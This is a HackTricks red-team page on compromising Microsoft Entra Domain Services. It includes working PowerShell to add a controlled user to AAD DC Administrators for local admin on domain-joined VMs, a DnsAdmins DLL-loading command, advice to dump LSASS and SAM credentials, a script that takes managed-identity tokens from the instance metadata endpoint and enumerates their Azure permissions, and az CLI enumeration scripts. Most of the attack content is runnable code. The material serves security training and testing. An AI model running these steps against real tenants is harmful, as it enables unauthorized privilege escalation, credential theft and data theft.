Az - Microsoft Entra Domain Services

Tip

Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Domain Services

Microsoft Entra Domain Services lets you deploy an Active Directory domain in Azure without managing the Domain Controllers (in fact you can't even access them).

Its main goal is to let you run legacy applications in the cloud that can't use modern authentication methods, or to cover scenarios where you don't want directory lookups to always go back to an on-premises AD DS environment.

Note that cloud-only users (created in Entra ID and not synchronized from another Active Directory) are not synchronized to the Domain Services domain until their password is changed: the password change (or reset) is what generates the NTLM and Kerberos password hashes the managed domain needs, so a user that existed before the domain was created must change their password before they can authenticate against it.

Warning

Even though you create a new Active Directory domain, you can't fully manage it (unless you abuse some misconfiguration), which means that by default you can't, for example, create users directly in the AD. You need to create them by synchronizing users from Entra ID. You can choose to synchronize all users (even those synchronized from an on-premises AD), only cloud users (users created in Entra ID), or even filter further.

Note

Overall, because of the lack of flexibility when configuring the new domain and because AD is usually already deployed on-premises, this isn't the main way Entra ID and AD are integrated, but it's still interesting to know how to compromise it.

Pivoting

Members of the generated AAD DC Administrators group are granted local administrator permissions on VMs joined to the managed domain (but not on the domain controllers), because they are added to the local Administrators group. Members of this group can also use Remote Desktop to connect to domain-joined VMs, and they are members of the following groups:

  • Denied RODC Password Replication Group: a group that specifies which users' and groups' passwords must not be cached on Read-Only Domain Controllers (RODCs).
  • Group Policy Creator Owners: members can create Group Policies in the domain. However, the group itself grants no right to link them anywhere or to edit existing GPOs, so on its own it isn't very useful in this environment.
  • DnsAdmins: allows managing the DNS server settings and was abused in the past to escalate privileges and compromise the domain (loading an arbitrary DLL into the DNS service through the ServerLevelPluginDll setting), but when that attack was tested in this environment the vulnerability turned out to be patched:
dnscmd TDW52Y80ZE26M1K.azure.hacktricks-training.com /config /serverlevelplugindll \\10.1.0.6\c$\Windows\Temp\adduser.dll

DNS Server failed to reset registry property.
Status = 5 (0x00000005)
Command failed:  ERROR_ACCESS_DENIED     5    0x5

Note that to grant these permissions, inside the AD the group AAD DC Administrators is made a member of the previous groups, and the GPO AADDC Computers GPO adds all the members of the domain group AAD DC Administrators to the local Administrators group of the joined computers.

Pivoting from Entra ID to an AD created with Domain Services is straightforward: add a user to the AAD DC Administrators group, wait for the membership to synchronize, RDP into any/all the machines in the domain and you will be able to steal data and compromise those hosts (keep in mind you still won't be a Domain Admin, since that role is not exposed in the managed domain).
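The whole pivot described above (enabling the controlled cloud-only user with a password change, adding it to AAD DC Administrators, then verifying from a joined VM how that group is nested into DnsAdmins and friends and pushed into local Administrators) as one added PowerShell example. This is not code from the original page: it assumes the Microsoft.Graph and RSAT ActiveDirectory modules, an Entra ID identity allowed to manage group membership and reset passwords, the domain name azure.hacktricks-training.com used elsewhere on the page, and placeholder user and password values; whether an admin-initiated reset (instead of a user-initiated change) is enough to generate the hashes is an assumption.

```powershell
# Added example, not from the original page. Pivot Entra ID -> Domain Services domain.
# Assumptions: Microsoft.Graph module on the attacker box, RSAT ActiveDirectory module on
# the domain-joined VM, a user you control, and the managed domain from the page.

# --- Step 1: from the attacker workstation (Microsoft Graph PowerShell) ---
Connect-MgGraph -Scopes "Group.ReadWrite.All", "User.ReadWrite.All", "Directory.ReadWrite.All"

$upn  = "attacker@hacktricks-training.com"     # placeholder cloud-only user you control
$user = Get-MgUser -UserId $upn

# Cloud-only users are not synchronized to Domain Services until their password changes:
# the password write generates the NTLM/Kerberos hashes the managed domain needs.
# Assumption: an admin reset triggers this too; otherwise let the user change it via SSPR.
Update-MgUser -UserId $user.Id -PasswordProfile @{
    Password                      = "<NewStrongPassword>"   # placeholder
    ForceChangePasswordNextSignIn = $false
}

# The Entra ID group that Domain Services maps to local Administrators on joined VMs
$group = Get-MgGroup -Filter "displayName eq 'AAD DC Administrators'"
New-MgGroupMember -GroupId $group.Id -DirectoryObjectId $user.Id

# Confirm membership; the change reaches the managed domain on the next sync cycle
Get-MgGroupMember -GroupId $group.Id |
    ForEach-Object { $_.AdditionalProperties.userPrincipalName }

# --- Step 2: after RDP to a domain-joined VM as that user (RSAT ActiveDirectory) ---
Import-Module ActiveDirectory
$domain = "azure.hacktricks-training.com"

# Groups that AAD DC Administrators is nested into (DnsAdmins, Denied RODC ..., GP Creator Owners)
Get-ADPrincipalGroupMembership -Identity "AAD DC Administrators" -Server $domain |
    Select-Object -ExpandProperty Name

# The AADDC Computers GPO pushes the domain group into the local Administrators group
Get-LocalGroupMember -Group "Administrators" |
    Where-Object { $_.Name -like "*AAD DC Administrators*" }

# Other synchronized admins that share the pivot group inside the domain
Get-ADGroupMember -Identity "AAD DC Administrators" -Server $domain -Recursive |
    Select-Object SamAccountName, ObjectClass

# Domain-joined computers you now have local admin on (the DCs themselves stay unreachable)
Get-ADComputer -Filter * -Server $domain -Properties OperatingSystem |
    Select-Object Name, DNSHostName, OperatingSystem
```

Group membership changes are not instantaneous in the managed domain: if `Get-ADGroupMember` does not list the user yet, wait for the synchronization to run before trying the RDP logon.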

However, pivoting from the domain to Entra ID is not as easy, as nothing from the domain is synchronized back into Entra ID. Still, always check the instance metadata of all the joined VMs, because their assigned managed identities might have interesting permissions. Also dump the credentials you can reach from the VMs you control (LSASS, SAM, cached domain logons; DCSync is not an option because AAD DC Administrators has no replication rights on the managed DCs) and try to crack or reuse them against Entra ID / Azure, since the domain passwords are the synchronized Entra ID passwords.
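The managed-identity check mentioned above, as an added PowerShell example to run from a compromised domain-joined VM (not code from the original page). It assumes the host is an Azure VM so the Instance Metadata Service at 169.254.169.254 is reachable, and that a system- or user-assigned managed identity is attached; no domain privileges are needed, only a shell on the VM.

```powershell
# Added example, not from the original page. From a compromised Azure VM, find out whether
# it has a managed identity and what that identity can do in Azure / Entra ID.
# Assumptions: Azure VM (IMDS reachable), identity assigned; endpoints are the public IMDS/ARM ones.

$imds = "http://169.254.169.254/metadata"
$hdr  = @{ Metadata = "true" }     # mandatory header; IMDS rejects requests without it

# 1. Where am I? (subscription, resource group, VM name)
$inst = Invoke-RestMethod -Headers $hdr -Uri "$imds/instance/compute?api-version=2021-02-01"
"VM {0} in RG {1}, subscription {2}" -f $inst.name, $inst.resourceGroupName, $inst.subscriptionId

# 2. Request an ARM token for the managed identity (HTTP 400 if no identity is assigned)
try {
    $tok = Invoke-RestMethod -Headers $hdr -Uri ("$imds/identity/oauth2/token?api-version=2018-02-01" +
                                                  "&resource=https://management.azure.com/")
} catch {
    Write-Warning "No managed identity token from IMDS: $($_.Exception.Message)"
    return
}
$auth = @{ Authorization = "Bearer $($tok.access_token)" }

# 3. Decode the JWT payload to learn which identity we got (appid / oid / tenant)
$payload  = ($tok.access_token -split '\.')[1].Replace('-', '+').Replace('_', '/')
$payload += '=' * ((4 - $payload.Length % 4) % 4)          # restore base64 padding
$claims   = [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($payload)) | ConvertFrom-Json
"Managed identity appid={0} oid={1} tenant={2}" -f $claims.appid, $claims.oid, $claims.tid

# 4. What can it see? Subscriptions, then RBAC assignments of this principal on the VM's subscription
$arm  = "https://management.azure.com"
$subs = Invoke-RestMethod -Headers $auth -Uri "$arm/subscriptions?api-version=2020-01-01"
$subs.value | Select-Object subscriptionId, displayName

$ra = Invoke-RestMethod -Headers $auth -Uri ("$arm/subscriptions/$($inst.subscriptionId)" +
        "/providers/Microsoft.Authorization/roleAssignments?api-version=2022-04-01" +
        "&`$filter=principalId eq '$($claims.oid)'")
$ra.value | ForEach-Object { $_.properties | Select-Object roleDefinitionId, scope }

# 5. Same request for Microsoft Graph: a token here means the identity may hold Graph app
#    roles (e.g. directory read/write), i.e. a direct path back into Entra ID
try {
    $graph = Invoke-RestMethod -Headers $hdr -Uri ("$imds/identity/oauth2/token?api-version=2018-02-01" +
                                                    "&resource=https://graph.microsoft.com/")
    "Got a Graph token; enumerate this identity's app role assignments next"
} catch {
    "No Graph-scoped token for the managed identity"
}
```

The role-assignment query only covers the VM's own subscription; if the identity is assigned roles at other scopes (another subscription, a management group, a key vault), repeat step 4 against those scopes or against each subscription returned in `$subs`.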

Note

Note that in the past other vulnerabilities in this managed AD were found that allowed compromising the DCs, like this one. An attacker who compromises a DC could very easily maintain persistence without the Azure admins noticing, or even being able to remove it.

Enumeration

# Get configured domain services domains (add more subscription IDs to the "subscriptions" array to check more subscriptions)
az rest --method post \
  --url "https://management.azure.com/providers/Microsoft.ResourceGraph/resources?api-version=2021-03-01" \
  --body '{
    "subscriptions": [
      "0ce1297c-9153-425d-3229-f51093614377"
    ],
    "query": "resources | where type == \"microsoft.aad/domainservices\"",
    "options": {
      "$top": 16,
      "$skip": 0,
      "$skipToken": ""
    }
  }'

# Get domain configuration
az rest --url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/entra-domain-services/providers/Microsoft.AAD/DomainServices/<domain-name>?api-version=2022-12-01&healthdata=true"
## e.g.
az rest --url "https://management.azure.com/subscriptions/0ce1297c-9153-425d-3229-f51093614377/resourceGroups/entra-domain-services/providers/Microsoft.AAD/DomainServices/azure.hacktricks-training.com?api-version=2022-12-01&healthdata=true"

# Based on the VNet assigned to the domain services, you can enumerate the VMs in the domain

subscription_id="0ce1297c-9153-425d-3229-f51093614377"
vnet_name="aadds-vnet"

# Retrieve all VMs in the subscription (name and resource group, tab separated)
vm_list=$(az vm list --subscription "$subscription_id" --query "[].{Name:name, ResourceGroup:resourceGroup}" --output tsv)

# Iterate through each VM and check whether any of its NICs sits in the domain services VNet
echo "VMs connected to VNet '$vnet_name':"
while IFS=$'\t' read -r vm_name resource_group; do
  nic_ids=$(az vm show --subscription "$subscription_id" --name "$vm_name" --resource-group "$resource_group" --query "networkProfile.networkInterfaces[].id" --output tsv)

  for nic_id in $nic_ids; do
    subnet_id=$(az network nic show --ids "$nic_id" --query "ipConfigurations[0].subnet.id" --output tsv)

    # Subnet IDs look like .../virtualNetworks/<vnet>/subnets/<subnet>; the trailing "/" avoids
    # matching VNets whose name merely starts with $vnet_name
    if [[ $subnet_id == *"virtualNetworks/$vnet_name/"* ]]; then
      echo "VM Name: $vm_name, Resource Group: $resource_group"
    fi
  done
done <<< "$vm_list"
